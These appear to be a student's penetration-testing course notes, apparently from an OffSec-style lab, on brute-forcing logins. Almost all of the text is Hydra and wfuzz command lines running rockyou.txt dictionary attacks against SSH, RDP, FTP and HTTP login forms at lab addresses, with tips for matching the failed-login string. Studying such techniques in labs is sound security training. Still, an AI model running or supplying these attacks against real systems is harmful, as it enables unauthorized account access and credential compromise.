- sudo gzip -d rockyou.txt.gz
- hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
- we could also attack built-in accounts such as root (on Linux) or Administrator (on Windows).
- hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
- hydra -L newlist.txt -P /usr/share/wordlists/rockyou.txt rdp://192.168.213.202
- hydra -L newlist.txt -p "SuperS3cure1337#" rdp://192.168.213.202
- hydra -l 'nadine' -P /usr/share/wordlists/rockyou.txt rdp://192.168.155.227
- sudo hydra -l itadmin -P /usr/share/wordlists/rockyou.txt -I ftp://192.168.213.202
There's difference between -l(name) and -L (files), -P (files) ,-p (password) so check for both*
- Hydra can be used for various services.
- hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid” (HTTP-GET)
→/index.php is page of the login and fm_usr and fm_pwd is from burp request and ” Login failed. Invalid” is the line from webpage failed login.
→Login failed. Invalid , this should be very accurate to get correctly. try doing with full command or some of what we see in failed login attempt. “Login failed. Invalid username or password”
- hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://192.168.213.201 (HTTP-GET)
hydra -L new.txt -P /usr/share/wordlists/rockyou.txt \\http-get://git.offseclab.io/api/v1/user
kali㉿kali)-[~]
└─$ wfuzz -z list,Billy-Jack-Lucy-Roger-administrator -z file,/usr/share/wordlists/seclists/Passwords/2020-200_most_used_passwords.txt --basic FUZZ:FUZZ http://git.offseclab.io/api/v1/user > output.txt
========================================================================